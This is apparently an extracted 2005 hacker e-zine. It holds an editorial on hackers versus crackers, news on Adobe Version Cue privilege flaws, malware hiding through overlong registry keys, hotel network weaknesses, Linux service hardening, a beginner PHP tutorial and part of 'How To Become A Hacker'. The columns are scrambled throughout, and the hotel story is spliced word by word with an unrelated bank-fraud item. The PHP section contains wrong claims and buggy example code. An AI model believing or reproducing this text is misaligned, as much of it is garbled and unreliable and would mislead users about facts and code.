Professional Documents
Culture Documents
The term "Hacker" for many means a person that steals user information, money, breaks
software, create viruses or invade your privacy. Well, my friend, this is wrong. A Hacker is
Ccucu, really a very good programmer with high brain capacity and you shouldn't confuse them
Chief Editor with Crackers or Carders. The problem is that a Hacker is always misunderstood. His
actions are generally un-offending or harmless. Maybe he's just bored...
But, we shouldn't forget that the best Internet "terrorists" are highly trained programmers.
The reasons why they do this could be various: from simply trying to prove that they are
‘better than others’ to the ‘will to do something new’ or ‘just spend their time in others way
than usual’. But the worst is when a Hacker motivates his actions by the lack of chance he
gets from society or the lack of money. And here comes the new aspect: it all starts with
some little mean action, and, very soon (and this is because they always know what they
are doing) become more confident in their actions and take advantage of rich or naive
people and this is when the transformation takes part: the Hacker becomes a “Cracker” or
a “Carder”.
A good example is that of Romanian Hacker, Calin Mateias. Calin Mateias was indicted by
a US court for conspiring to steal $10m of computer equipment from Ingram Micro. It
seems that the Romanian "Hacker" operates under the name Dr Mengele; he hacked into
the computer company’s systems and placed over 2000 fraudulent orders for goods before
he was caught. He also had several contact people in the US who helped Calin Mateias to
sell the equipment he ordered. His accomplice was also charged at the hearing in L.A., if
convicted Mateias could face up to 15 years in prison. Calin was once a great Hacker. He
crossed the line and paid for his actions hard and strong. And so, the world lost a great
Hacker and a very promising programmer. And this is only a little example. Most crimes
aren't brought in the light because it is a small one or the company might feel ashamed.
Most of Internet "terrorists" steal between $100-400. They pay for their crimes as everyone
else does, but they aren't seen by the large public. But somehow when big companies or
governmental organizations hear about them they try to get them to work for them, to use
their knowledge and stop others that make the same mistakes they did before. They
rehabilitate them so that they can lead their lives in a respectful way. Ex: In the movie ‘Bad
Boys’ the police (Will Smith & Martin Lawrence) get a hacker out of jail and as him to hack
into a ex-cop’s files to solve a case, and later in the sequel ‘Bad Boys II’ you can see the
same hacker working in the police force, and helping them.
Real Hackers aren't just a few. They are in fact a very well organized community and there
are even Hacker’s trials. The best will win the money that others hope to steal and also win
what everybody wants: RESPECT. Also, there are even sites that put up challenges to
Hackers: for example decrypt some code by another Hacker and if their good they can put
up a challenge of their own. If jogging is a hobby to someone, same is here. But a large
community pushes it to extreme and hacking becomes a drug, a good but dangerous job.
Many know that real hackers work for big companies or NASA or other government facility
or organization and you won't see them making jail.
But if this phenomenon isn't controlled and we don't give these high-gifted youngsters real
opportunities, we shouldn't be wondering how young John from your street is on the TV as
a "big star”, as a Carder or one of the most wanted Crackers that crawl over the Internet.
Ccu
Digitally signed by
Ccucu He'll be like Osama Bin-Laden of the World Wide Web. So encourage them, use their
DN: cn=Ccucu, c=US, knowledge for your protection, or say like a great person once said “Hack me, baby!”
o=Ccucu, ou=Ccucu's
WareZ, email=forumc.
tk@gmail.com
cu Reason: I am the
author of this document
Date: 2005.10.07
20:39:07 +03'00'
Flaws revealed in Adobe Version Cue
Company has issued a patch for vulnerabilities
Two new security vulnerabilities were revealed this The flaws were discovered by an individual
week in Adobe Systems' Version Cue software, the who only wanted to be identified by his online
second and third security flaws discovered in the code name, "vade79," and were submitted to
company's software in less than two weeks, according iDefense through its Vulnerability Contributor
to security consulting firm iDefense. Program, Sutton said.
Both flaws allow local attackers to gain root privileges
to a machine through Version Cue, the file-version Sutton said the flaws are "far from the sexiest
manager in Adobe's Creative Suite software, vulnerabilities we’ve ever seen" since they can
according to Michael Sutton, director of iDefense only be exploited by local attackers, meaning
Labs at iDefense, a VeriSign Inc. company. they already must have access to the machine
to exploit the flaws. Also, the flaws only affect
One flaw is a "library loading vulnerability" that versions of Creative Suite for Apple OS X, so
enables potential hackers to load a custom library by there is a "limited user base" that is affected, he
executing a method from the command line of said.
VCNative, a root application in Version Cue, said
Rich Johnson, a senior security engineer with Still, the vulnerability risk is made more
iDefense Labs. In this way, someone could take full significant by the fact that the flaws are
control of a system and gain root privileges, thus relatively easy to exploit once a user has access
enabling them to introduce malicious code. to a machine, and there is already exploit code
that could be used to take advantage of the
The other way someone could gain root privileges vulnerabilities that has been released publicly,
through Version Cue is to exploit the log file created Sutton said. Though he does not know where
when the root application VCNative begins running, the code originated, it can be found on the Web
he said. The log file is always called the same thing, site of the French Security Incident Response
and if a person "knows what it's called they could put Team, www.frsirt.com, Sutton said.
a file in there that would allow redirection of that file
to a location of choice, then can override special With the discovery of the Version Cue
system files with this," Johnson said. vulnerabilities, there have now been three flaws
discovered in Adobe's software in less than two
Though published reports claimed that the flaws affect weeks. On Aug. 16, Adobe issued its own
the most recent version of the suite, Creative Suite 2, security advisory on a buffer overflow
an Adobe spokesman said in an interview Tuesday discovered in Adobe Acrobat and Adobe
that this is not the case. The flaws only affect the Reader. The company immediately issued a
previous Creative Suite release, which came out in product update to patch the flaw.
August 2003, said Bob Schaffel, senior product
manager of Version Cue for Adobe. The recent spate of vulnerabilities are not
indicative of a lack of overall security in
Adobe already has issued a patch for both Adobe's software platform, but instead are the
vulnerabilities, which can be downloaded at inevitable result of developing a broad portfolio
http://www.adobe.com/support/security/main.html#vc of software, Schaffel said.
uemac, he said.
"I don’t think this should be seen as some kind
of internal trend," he said. "When you consider
the broad number of products and the
enormous amount of code [we develop], every
now and then something like this manages to
slip through."
The Threat
Source:
from Within
The Threat from Windows Worm
Within Variants Emerge,
Even the best virus protection and network security
won't shield your company from a virus if one of your Attack
employees downloads it intentionally. While any
company can be the target of internal sabotage, a recent
survey of security and HR execs by risk management
consultancy Risk Control Strategies shows that
companies with between 500 and 900 employees are the
most at risk: twenty-three percent of those companies
have been victimized by internal sabotage through virus
downloads in the past two years.
Last week, the Internet Storm Center, a group of security The creators of more advanced rootkits--software
professionals that track threats on the Net, flagged a flaw in designed to stealthily and completely compromise a
how a common Microsoft Windows utility and several anti- system--are starting to add memory hiding to their bag
spyware utilities detect system changes made by malicious of tricks, said Greg Hoglund, CEO of software analysis
software. By using long names for registry keys, spyware firm HBGary and author of the recently published
programs could, in a simple way, hide from such utilities yet ROOTKITS: Subverting the Windows Kernel. Hoglund
still force the system to run the malicious program every discussed the technique at the Black Hat Security
time the compromised computer starts up. Briefings and DEF CON hacker convention in July.
Already, some spyware authors seem to be playing with the "Spyware is the biggest problem right now, and the
rudimentary technique to try and hide their programs, said people that are writing it are starting to get a clue, and
Tom Liston, a handler for the Internet Storm Center and a that's a scary trend," Hoglund said.
network security consultant for Intelguardians.
The potential for hiding the execution of programs using
"We have seen indications that someone is trying this overly long registry keys, on the other hand, is much
technique out," Liston said. "Basically, we have seen code smaller, because Microsoft and affected security
that is stuffing a key in the registry with a huge length. Yet, software vendors will likely fix the affected utilities
the author still doesn't have it working." soon, he said.
A Microsoft representative said that the company is "None of the people that I know who are writing rootkits
investigating the report, but does not consider the problem an would not use this method to hide the key," he said.
operating system flaw.
The technique involves using a registry key whose name
is longer than 256 bytes. The Windows Registry holds
important system data, including what programs to run
at startup. The long key and any of its subkeys are not
seen by the affected utilities, but can be read by the
system just fine. By using the technique, a malicious
program could run every time a computer is started, but
keep its execution a secret from the utilities, the Internet
Storm Center said.
After you download and install the program, choose the second Updated daily, the NVD contains information on
button from the top-right corner to open the integrated almost 12,000 vulnerabilities. It allows users to search
WebUpdate tool, and ensure that you have the most recent list of by a variety of characteristics, including software
adware definitions. With your new definitions in place, click the name and version number; vendor name; and
Scan now button on the left, choose Perform smart system scan, vulnerability type, severity and impact, the agency
and click Next. When the scan finishes, click Next again to see said. The database can also be used to research the
the scan results. vulnerability history of a product and view
vulnerability statistics and trends.
The entries listed under the Critical Objects tab are files that Ad-
Aware has identified as potential threats to your privacy. Use the The NVD was developed by researchers in the NIST's
program's Knowledge Base and Threat Assessment Chart to Computer Security Division in conjunction with the
determine whether to delete the files: Click Help, Contents, Department of Homeland Security's National Cyber
double-click Support, and choose either entry to view more Security Division.
information. (Note that many of the "threats" may be relatively
harmless tracking cookies that you might find useful when you
return to the sites that left them. For example, a cookie left by a
shopping site may display items similar to those you've recently
purchased on the site.) Check the files you want to delete, and
choose Quarantine.
Now click the Negligible Objects tab to see the 'Most Recently
Used' files list. The list tracks the documents you've opened lately
in such applications as Adobe Reader and Microsoft Office, the
terms you've entered in your browser's search and Address fields,
and your file-download history, among other activities. Check the
items you'd like to erase, click Quarantine, give the file a name
(such as old history), and click OK twice. Choose Next and
OK once more to view the scan results.
Identity Theft Is Out of Control
More than 7 million people are victims
of identity theft each year—or nearly "Two servers or even two different Web sites can
20,000 thefts a day—according to work together to verify information like this, but
Gartner Research and Harris without either one of them knowing enough to
Interactive. Many thefts occur because answer or find out the answers themselves," says
of casual mistakes in the offline world: Dr. Burt Kaliski, chief scientist for RSA Labs. Even
handing a credit card to the wrong if someone hacks the servers, they can't access your
person or scribbling your Social information.
Security number on a sheet of paper someone can
find. But many more are facilitated by the Internet, Others are working to provide stronger
which still has a long way to go when it comes to authentication via hardware devices. Charles
protecting our privacy. Palmer, head of security and privacy at IBM
Research, believes many online privacy woes can
Identity pirates can gather all sorts of confidential be solved by leveraging a security chip like the
information about you by prowling the Web. With a Trusted Platform Module, an IBM-developed
little more ingenuity, they can hack into your online device now championed by several industry players.
accounts—mining credit card numbers, addresses, and This kind of chip encrypts files and passwords,
telephone numbers. And if you let your guard down, making them readable only on your computer.
they can use underhanded techniques like phishing
and pharming to fool you into giving them
information. Social engineers con many people into
giving out sensitive data simply by asking for it.
Source:
Hotel hacking could pump smut into
every room
Hotel hybrid broadband internet and TV-on-demand entertainment systems are open to attack, security
researchers warn. Penetration testing firm SecureTest has identified a number of vulnerabilities in the
implementation of hotel broadband systems delivered using Cisco's LRE (long-reach Ethernet) technology.
Using a laptop connected to a hotel network, SecureTest found it was possible to control the TV streams
sent to each room or gain access to other user’s laptops.
dragnet
According to SecureTest, a hacker might be able to
access this menu and configure the system to display
adult content on every TV channel. The port could also
be used to broadcast content directly from a laptop over
the TV. In theory, this could enable hackers to download
and broadcast any material throughout the hotel
complex.
Another vulnerability revolved around insecure network
configuration. There appeared to be no segregation
between client devices, creating a means for a user to
access other devices connected to the same hotel
network. The system scrutinised used a Cisco 575 LRE
box, which allows existing CAT2 (telephone) cabling to
carry on-demand services avoiding the need to roll out
CAT5 (twisted pair) cabling to each room.
The security risk lies not in terms of this technology but
in how it was implemented, problems SecureTest has
seen replicated at other hotels. During a previous
investigation, SecureTest used a different fixed
internet/TV hotel system implemented by another hotel
chain and located a connection to an internal FTP server.
This provided open access to information such as a
backup database of TV usage.
"A hacker or disgruntled employee could get their kicks
byy accessing and manipulating the TV menu, but this
er implications.
breach has much widBrazilian federalAn individual
police last week cuffed 85
own advertising
could broadcast their people across sevenor an activist
states their of hacking
suspected
e to every
own political messagonline bankroom," saidand
accounts SecureTest's
netting $33m,
Munro. "Moreover, fixed internet
Reuters access is inadequately
reports.
protected in many cases.
The People
arrests plug
were into a hotel
the culmination of a four-
network assuming it’smonth
a trusted connectioncodenamed
investigation, but it’s not."Operation
Unless they have a personal
Pegasus", firewall
whichrunning,
generatedfraudsters
105 arrest warrants.
can snoop on desktops A at leisure.
total of 410Hotels andtook
officers suppliers
part inofthe swoop.
guest entertainment systems need to act now to prevent
these scenarios."
Is Google Exposing You to Hack Attacks?
Hackers use search engine to find unsecured sites, networks, routers, and Webcams.
You may not have the time or the motivation to delve into
all of those tomes, so we're going to make this a bit This will print up something like this
simpler.
tcp 0 0 *:6000 *:* LISTEN
There are several methods remote attackers can use to tcp 0 0 *:www *:* LISTEN
break into your machine. Usually they are exploiting tcp 0 0 *:auth *:* LISTEN
problems with existing programs. The Linux community tcp 0 0 *:finger *:* LISTEN
always quickly spots these 'exploits' and releases a fix. tcp 0 0 *:shell *:* LISTEN
Linux fixes are usually out long before the equivalent tcp 0 0 *:sunrpc *:* LISTEN
programs in other operating systems are mended. The
issue here though is how to prevent your machine from Each line that says LISTEN is a service waiting for
suffering any sort of problem of this sort. connections.
Some of these services run as stand-alone programs, but
There are several methods remote attackers can use to many of them are controlled by /etc/inetd.conf. If you
break into your machine. Usually they are exploiting are not sure what a service does, look it up in
problems with existing programs. The Linux community /etc/inetd.conf. For instance, if you type
always quickly spots these 'exploits' and releases a fix.
Linux fixes are usually out long before the equivalent grep '^finger' /etc/inetd.conf
programs in other operating systems are mended. The
issue here though is how to prevent your machine from you will get back a line from inetd.conf like this
suffering any sort of problem of this sort.
finger stream tcp nowait nobody /usr/sbin/tcpd
/usr/sbin/in.fingerd
To see what the program does, look up in.fingerd in the man
page. If you think you can live without this service, then it Ssh is a stable, well-developed system with open
can be turned off in /etc/inetd.conf. By commenting out the source that provides encryption and authentication on
line (put a # at the start of the line) and then issuing the connections. Encryption is using codes to protect the
command kill all -HUP inetd you can immediately and packets of data while in transit. Authentication is a
permanently turn a service off. There is no need to reboot. process for verifying if a.packet of data or a
connection is valid. There are ssh clients for most
If a service is not listed in /etc/inetd.conf then it probably other operating systems too. By using Linux as a
runs as a stand-alone program. server you can provide ssh level security for all your
network use.
You can remove a service provided by a stand-alone
background program by uninstalling its package. Only do
this if you are sure about what the program does and are
certain that it is not necessary.
Another logging/intrusion detection type tool is called The main drawback with making your systems more
Tripwire. It takes a snapshot of your important system files secure is that they become less accessible. The idea behind
and records their signature in a database. Various signature ramping up your system's security is to stop use of your
levels are available from mild to wild. You can also set the computers, by crooks, thieves and malcontents. Before
rules in a policy file to tell Tripwire what to check. After the implementing any of the ideas in this article you should
database is initialized and signed Tripwire can be executed consider carefully the opposite side of the coin: the
whenever you need to check the integrity of your system. systems are there to be used by your users! Linux has a
The report will point out when your files are changed and the wide range of security tools and by carefully combining
severity of the security risk. The Tripwire report is pretty various techniques and programs, you should be able to
easy to read and can be customized according to your file come up with a good balance between ready access and
tracking needs. Why not set Tripwire up to run every day, system security.
early in the morning and have a report ready to look at, with
your first cup of coffee?
What is PHP? PHP has been used to create shopping carts, address
books, photo galleries, contact lists, catalogs, user
PHP is an interpretted language that has similarities to C. PHP forums, and many other types of content on the
scripts are written and typically saved with a file extension of web. The uses of PHP are endless. Since PHP can
.php . These PHP scripts can be run by a webserver (i.e. also be run from the command-line, it is possible to
MicroSoft Internet Information Services or Apache) for use on use PHP to do server administrative tasks, or run
a web page, or from the command line if PHP is configured PHP scripts from cronjobs.
this way.
PHP Examples
An example of PHP in use is on this webpage. If you look at To give you an idea of what the PHP language
the URL address of this page, you will notice the following: looks like, as mentioned, it looks similar to C, as it
requires a semi-colon to close each command line
www.vcvtech.com/index.php of code. The characters (together they're called a
tag) open and close your PHP script, which may be
The file, index.php, is a PHP script that helps serve the pages contained in a text file by itself, or in the middle of
of the website. some HTML code. These tags tell the web server to
begin translating PHP code. An example of PHP is
listed below:
What do I need to program with PHP?
<? echo "Hello World";?>
The example script above, if it were saved in a file
In order to program with PHP, you will need a good text editor and called upon by the webserver, it would display
- preferably one that recognizes when PHP code is being "Hello World" on an otherwise blank page.
typed. These 'PHP aware' editors allow for the user to easily if...Then statements look like the following:
distinguish between PHP code, and other types of code, such as <?
Javascript or HTML, typically by color coding and bolding the $flag = $_POST["answer"];
text of each type, differently. A good example of a freeware if($flag==true) {
editor is HTML-Kit (www.chami.com), which was used for a echo "It is TRUE!!!";
majority of the programming work on this website. } else {
It is also recommended that you have access to PHP by echo "It is absolutely, FALSE!!! Get out of here
installing it with a webserver, either on a Linux system, or a and don't come back till it is TRUE!!!";
MicroSoft Windows-based workstation. Better yet, use a web }
hosting provider that provides PHP as one of its services with it ?>
web hosting package. It is easy and useful to learn PHP in The above example leaned a bit toward the dramatic
conjunction with MySQL, and Apache or IIS, which is side, but illustrates how closely PHP resembles C.
typically available with web hosting services. It is of the author's opinion that if a programmer is
proficient in C, of which many of PHP's commands
are copies of, then PHP should be easy to learn by
that programmer. Otherwise, PHP is still a good
language to learn, but it is advised that as one first
begins to learn PHP, that he or she has a good tutor
or book to refer to in order to avoid getting
What kind of programs can I create with PHP? into bad habits, such as creating spaghetti code
that lumps all of a programs functionality into one
PHP is typically used in conjunction with a web server and a long script, instead of segregating it into seperate,
database, such as Apache (www.apache.org) and MySQL re-usable functions. The topic of PHP writing style
(www.mysql.org), in order to assist in displaying dynamic web is beyond the scope of this article, but will be
pages. covered in another tutorial.
What other resources are available to learn
PHP? PHP Variables
The web is full of resources to be looked up to learn The syntax used for variables in PHP requires
programming PHP. PHP's official site, www.php.net has a that variable names be preceeded by a dollar
searchable index of all of PHP's commands, and there are sign($). Variable names can start with a letter or
dicussions posted with each command, that give further underscore, and may have numbers,letters, or
details and examples of the command's usage. Other underscores, following. Variable names in PHP
websites worth taking a look at include the following: are case sensitive – an important point to
remember if you’re modifying some PHP code.
www.devshed.com
Variables are assigned values by using the ‘equal’
www.w3schools.com sign – a standard practice in most common
programming languages. For example, to set $a
to equal ‘5’:
www.php-scripts.com
$a = ‘5’;
www.phpbuddy.com
We may set $b to equal 5.
www.webmonkey.com
$b= 5;
This list should be enough to get you started.
PHP decides the type of variable depending upon
the value that is being assigned. Addition of $a +
$b results in an error. However, if you are
performing a string function, such as
concactenation, PHP automatically converts
numeric variables to strings.
or use
$number+=$b;
Finally, it should be mentioned that PHP variables may be set Notice that print_r displays the key value of the
to values, or references to other variables that are already set array followed by the value itself (i.e. the key
with values. These are considered reference variables, similar value of 0, is between the brackets, listed as [0]).
to those used in the C language, in which the variable doesn’t It is interesting to note that PHP arrays can have
actually contain the value of the variable it is pointing to, but it key values that are non-numeric. For example,
is only JUST a pointer or reference. You can also consider it you can set the following array:
an alias of the variable, as a another means to describe it. By
using reference variables, such as when pointing to an array or $my_new_array[‘test’] = “this is a test”;
a object (objects will be discussed in another tutorial), the
whole array or object doesn’t have to be copied again – rather
If you do a print_r, you will see that [‘test’]
the reference variable points at the variable’s location in
appears as a key value. One of the greatest
memory (Remember, it is memory, typically RAM, that
attributes of PHP is that it allows you to create
contains all your variables, besides your PHP code when you
keys from words so that your keys can have
run your PHP script!).
descriptive meanings or be more easily linked to
fields in a database or from $_POST data from a
PHP Arrays form.
PHP arrays are used very similarly to those in BASIC, except If you use closed brackets after your array names,
you do not need to dimension them in advance. PHP also and do not specify a key value when inserting
provides an immense number of array functions, that provide values into the array, you should be aware of the
great power to their usage. Volumes could be written on the pitfalls you may encounter. PHP Array pitfalls
various uses of PHP arrays, but it is probably better to will be covered in the next chapter.
reference www.php.net/arrays to gather more information on
more complex topics of arrays, that will not be covered in this
PHP Array Pitfalls To Avoid
basic tutorial.
PHP arrays are already set to receive an infinite number of I was helping an up an coming PHP developer at
items. The syntax for setting your PHP array is as follows: the office the other day - it happened to be his
birthday and he was in a hurry to leave for a
$my_array[0] = “This is a test”; dinner engagement with his family.
Unfortunately, he was wrestling with PHP and its
handling of arrays. I recognized the problem
Interestingly, values may be appended to this array by using
immediately, recounting my own experiences
two closed, empty brackets as shown by the following:
with getting $_POST data from a form with
$my_array[] = “This is another test”;
checkboxes and several text input fields, and
$my_array[]=”Hey Mom, isn’t this cool?!”;
expecting the data to line up perfectly with some
corresponding data from a MySQL database.
PHP will append a value to the next available slot of your
array. PHP maintains an index of each array. The reason he was experiencing a problem was
that as he was having data input into a form on
his website into an HTML array variable called
A useful function to view the contents of an array is print_r, as
data[] , he was hoping that the 3rd instance of the
seen below:
field on his form would also be put into the 3rd
slot of his PHP array, which he called
print_r($my_array); $formdata[] .
Unfortunately, when you have a closed bracket
Output:
array, items are added to the next available
indexed key value of the array. This is true for
$my_array Array( [0]=>”This is a test”;[1]=>”This is both HTML and PHP. Thus, if he had 3 fields on
another test”;[2]=>”Hey Mom, isn’t this cool?!”;) his form using data[], and when the HTML is
displayed in the browser, the user fills in the 3rd
field on the form, data[0] will contain the value -
not data[3]. Therefore, if you want to retrieve
data from a form with array variables, it is better
to specify the key each array.
An example in which an array would be used on a form and
then used by PHP is listed below, in which we have an online
quiz form. PHP IF... THEN Statements
<HTML>
<BODY> To use IF..THEN.. and ELSE within PHP, the
<FORM name="form" method="post" following example is provided, in which we will
action="process.php"> test to see if a variable $flag is set to TRUE.
<H4>What is my favorite food(s)? (Check all that
apply)</H4> if ($flag == TRUE) {
<a>Cheeseburger? A.<input name="answers[A]" echo “The flag is set to TRUE”;
type="checkbox"></a><BR> } else {
<a>Hot Dots? B.<input name="answers[B]" echo “The flag is not set to
type="checkbox"></a><BR> TRUE”;
<a>Tacos? C.<input name="answers[C]" }
type="checkbox"></a><BR>
<a>Chicken? D.<input name="answers[D]" Notice that we used a double equal sign as a
type="checkbox"></a><BR> comparison operator. PHP requires this syntax as it
<button type="submit">Submit</button> would consider $flag=TRUE to mean that we’re
</FORM> trying to set the variable instead of performing a
</BODY> condition. For more information on PHP’s
<HTML> comparison operators, click here to reach the
The PHP script that retrieves and processes the information is ‘comparison operator’ section of the PHP manual at
below: www.php.net.
<?
$correct_answers_array = array("A","B");
$answerstring=implode(",",$correct_answers_array); More in the next issue!
$correct_flag= true;
$posted_answers = $_POST['answers'];
foreach($posted_answers as $key=>$value) {
if ($correct_flag != False ) {
$correct_flag = True;
}
if (!in_array($key,$correct_answers_array )) {
$correct_flag = false;
echo "false";
} else {
unset($posted_answers['$key']);
}
}
if ($correct_flag==True and
count($_POST['answers'])==count($correct_answers_arra
y)) {
echo "YOU 100% RIGHT!<br>";
} else {
echo "You were not 100% correct…I’m very
disappointed in you.<BR>";
echo "The correct answer should have been
".$answerstring.".<BR>";
} ?>
How To Become A Hacker
What Is a Hacker? The basic difference is this: hackers build things,
crackers break them.
The Jargon File contains a bunch of definitions
of the term "hacker", most having to do with If you want to be a hacker, keep reading. If you
technical adeptness and a delight in solving want to be a cracker, go read the alt.2600
problems and overcoming limits. If you want to newsgroup and get ready to do five to ten in the
know how to become a hacker, though, only two slammer after finding out you aren't as smart as
are really relevant. you think you are. And that's all I'm going to say
about crackers.
There is a community, a shared culture, of expert
programmers and networking wizards that traces The Hacker Attitude
its history back through decades to the first time-
sharing minicomputers and the earliest ARPAnet Hackers solve problems and build things, and
experiments. The members of this culture they believe in freedom and voluntary mutual
originated the term 'hacker'. Hackers built the help. To be accepted as a hacker, you have to
Internet. Hackers made the Unix operating behave as though you have this kind of attitude
system what it is today. Hackers run Usenet. yourself. And to behave as though you have the
Hackers make the World Wide Web work. If you attitude, you have to really believe the attitude.
are part of this culture, if you have contributed to
it and other people in it know who you are and
But if you think of cultivating hacker attitudes as
call you a hacker, you're a hacker. just a way to gain acceptance in the culture,
you'll miss the point. Becoming the kind of
The hacker mind-set is not confined to this person who believes these things is important for
software-hacker culture. There are people who you --- for helping you learn and keeping you
apply the hacker attitude to other things, like motivated. As with all creative arts, the most
electronics or music --- actually, you can find it effective way to become a master is to imitate
at the highest levels of any science or art. the mind-set of masters --- not just intellectually
Software hackers recognize these kindred spirits but emotionally as well.
elsewhere and may call them 'hackers' too --- and
some claim that the hacker nature is really Or, as the following modern Zen poem has it:
independent of the particular medium the hacker
works in. But in the rest of this document we
will focus on the skills and attitudes of software
hackers, and the traditions of the shared culture To follow the path:
that originated the term 'hacker'. look to the master,
follow the master,
walk with the master,
There is another group of people who loudly call see through the master,
themselves hackers, but aren't. These are people
become the master.
(mainly adolescent males) who get a kick out of
breaking into computers and phreaking the
phone system. Real hackers call these people So, if you want to be a hacker, repeat the
'crackers' and want nothing to do with them. Real following things until you believe them:
hackers mostly think crackers are lazy,
irresponsible, and not very bright, and object that 1. The world is full of fascinating
being able to break security doesn't make you a problems waiting to be solved.
hacker any more than being able to hotwire cars
makes you an automotive engineer.
Being a hacker is lots of fun, but it's a kind of
Unfortunately, many journalists and writers have
fun that takes lots of effort. The effort takes
been fooled into using the word 'hacker' to
motivation. Successful athletes get their
describe crackers; this irritates real hackers no
motivation from a kind of physical delight in
end.
making their bodies perform, in pushing
themselves past their own physical limits. To behave like a hacker, you have to believe this
Similarly, to be a hacker you have to get a basic enough to want to automate away the boring bits
thrill from solving problems, sharpening your as much as possible, not just for yourself but for
skills, and exercising your intelligence. everybody else (especially other hackers).
If you aren't the kind of person that feels this (There is one apparent exception to this. Hackers
way naturally, you'll need to become one in will sometimes do things that may seem
order to make it as a hacker. Otherwise you'll repetitive or boring to an observer as a mind-
find your hacking energy is sapped by clearing exercise, or in order to acquire a skill or
distractions like sex, money, and social approval. have some particular kind of experience you
can't have otherwise. But this is by choice ---
You also have to develop a kind of faith in your nobody who can think should ever be forced into
own learning capacity --- a belief that even a situation that bores them.)
though you may not know all of what you need
to solve a problem, if you tackle just a piece of it 4. Freedom is good.
and learn from that, you'll learn enough to solve
the next piece --- and so on, until you're done.)2. Hackers are naturally anti-authoritarian. Anyone
No problem should ever have to be solved who can give you orders can stop you from
twice. solving whatever problem you're being
fascinated by --- and, given the way authoritarian
Creative brains are a valuable, limited resource. minds work, will generally find some appallingly
They shouldn't be wasted on re-inventing the stupid reason to do so. So the authoritarian
wheel when there are so many fascinating new attitude has to be fought wherever you find it,
problems waiting out there. lest it smother you and other hackers.
To behave like a hacker, you have to believe that (This isn't the same as fighting all authority.
the thinking time of other hackers is precious -- Children need to be guided and criminals
so much so that it's almost a moral duty for you restrained. A hacker may agree to accept some
to share information, solve problems and then kinds of authority in order to get something he
give the solutions away just so other hackers can wants more than the time he spends following
solve new problems instead of having to orders. But that's a limited, conscious bargain;
perpetually re-address old ones. the kind of personal surrender authoritarians
want is not on offer.)
(You don't have to believe that you're obligated
to give all your creative product away, though Authoritarians thrive on censorship and secrecy.
the hackers that do are the ones that get most And they distrust voluntary cooperation and
respect from other hackers. It's consistent with information-sharing --- they only like
hacker values to sell enough of it to keep you in 'cooperation' that they control. So to behave like
food and rent and computers. It's fine to use your a hacker, you have to develop an instinctive
hacking skills to support a family or even get hostility to censorship, secrecy, and the use of
rich, as long as you don't forget your loyalty to force or deception to compel responsible adults.
your art and your fellow hackers while doing it.) And you have to be willing to act on that belief.
Learning to program is like learning to write So, bring up a Unix --- I like Linux myself but
good natural language. The best way to do it is to there are other ways (and yes, you can run both
read some stuff written by masters of the form, Linux and Microsoft Windows on the same
write some things yourself, read a lot more, write machine). Learn it. Run it. Tinker with it. Talk to
a little more, read a lot more, write some more - the Internet with it. Read the code. Modify the
and repeat until your writing begins to develop code. You'll get better programming tools
the kind of strength and economy you see in (including C, LISP, Python, and Perl) than any
your models. Microsoft operating system can dream of
hosting, you'll have fun, and you'll soak up more
Finding good code to read used to be hard, knowledge than you realize you're learning until
because there were few large programs available you look back on it as a master hacker.
in source for fledgeling hackers to read and
tinker with. This has changed dramatically; For more about learning Unix, see The
open-source software, programming tools, and Loginataka. You might also want to have a look
operating systems (all built by hackers) are now at The Art Of Unix Programming.
widely available. Which brings me neatly to our
next topic? To get your hands on a Linux, see the Linux
Online! site; you can download from there or
2. Get one of the open-source Unixes (better idea) find a local Linux user group to help
and learn to use and run it. you with installation. From a new user's point of
I'm assuming you have a personal computer or view, all Linux distributions are pretty much
can get access to one (these kids today have it so equivalent.
easy :-)). The single most important step any
newbie can take toward acquiring hacker skills is You can find BSD Unix help and resources at
to get a copy of Linux or one of the BSD- www.bsd.org.
Unixes, install it on a personal machine, and run
it. I have written a primer on the basics of Unix and
the Internet.
Yes, there are other operating systems in the
world besides Unix. But they're distributed in (Note: I don't really recommend installing either
binary --- you can't read the code, and you can't Linux or BSD as a solo project if you're a
modify it. Trying to learn to hack on a Microsoft newbie. For Linux, find a local Linux user's
Windows machine or under MacOS or any other group and ask for help.)
closed-source system is like trying to learn to
dance while wearing a body cast. 3. Learn how to use the World Wide
Web and write HTML.
Under OS/X it's possible, but only part of the
system is open source --- you're likely to hit a lot
of walls, and you have to be careful not to Most of the things the hacker culture has built do
develop the bad habit of depending on Apple's their work out of sight, helping run factories and
proprietary code. If you concentrate on the Unix offices and universities without any obvious
under the hood you can learn some useful things. impact on how non-hackers live. The Web is the
one big exception, the huge shiny hacker toy that
even politicians admit is changing the world. For
this reason alone (and a lot of other good ones as Status in the Hacker Culture
well) you need to learn how to work the Web.
Like most cultures without a money economy,
This doesn't just mean learning how to drive a hackerdom runs on reputation. You're trying to
browser (anyone can do that), but learning how solve interesting problems, but how interesting
to write HTML, the Web's markup language. If they are, and whether your solutions are really
you don't know how to program, writing HTML good, is something that only your technical peers
will teach you some mental habits that will help or superiors are normally equipped to judge.
you learn. So build a home page. Try to stick to
XHTML, which is a cleaner language than
classic HTML. (There are good beginner Accordingly, when you play the hacker game,
tutorials on the Web; here's one.) you learn to keep score primarily by what other
hackers think of your skill (this is why you aren't
really a hacker until other hackers consistently
But just having a home page isn't anywhere near call you one). This fact is obscured by the image
good enough to make you a hacker. The Web is of hacking as solitary work; also by a hacker-
full of home pages. Most of them are pointless, cultural taboo (now gradually decaying but still
zero-content sludge --- very snazzy-looking potent) against admitting that ego or external
sludge, mind you, but sludge all the same (for validation are involved in one's motivation at all.
more on this see The HTML Hell Page).
Specifically, hackerdom is what anthropologists
To be worthwhile, your page must have content - call a gift culture. You gain status and reputation
-- it must be interesting and/or useful to other in it not by dominating other people, nor by
hackers. And that brings us to the next topic? being beautiful, nor by having things other
people want, but rather by giving things away.
4. If you don't have functional Specifically, by giving away your time, your
English, learn it. creativity, and the results of your skill.
As an American and native English-speaker There are basically five kinds of things you can
myself, I have previously been reluctant to do to be respected by hackers:
suggest this, lest it be taken as a sort of cultural
imperialism. But several native speakers of other 1. Write open-source software
languages have urged me to point out that
English is the working language of the hacker The first (the most central and most traditional)
culture and the Internet, and that you will need to is to write programs that other hackers think are
know it to function in the hacker community. fun or useful, and give the program sources away
to the whole hacker culture to use.
This is very true. Back around 1991 I learned
that many hackers who have English as a second (We used to call these works 'free software', but
language use it in technical discussions even this confused too many people who weren't sure
when they share a birth tongue; it was reported to exactly what 'free' was supposed to mean. Most
me at the time that English has a richer technical of us, by at least a 2:1 ratio according to web
vocabulary than any other language and is content analysis, now prefer the term 'open-
therefore simply a better tool for the job. For source' software).
similar reasons, translations of technical books
written in English are often unsatisfactory (when
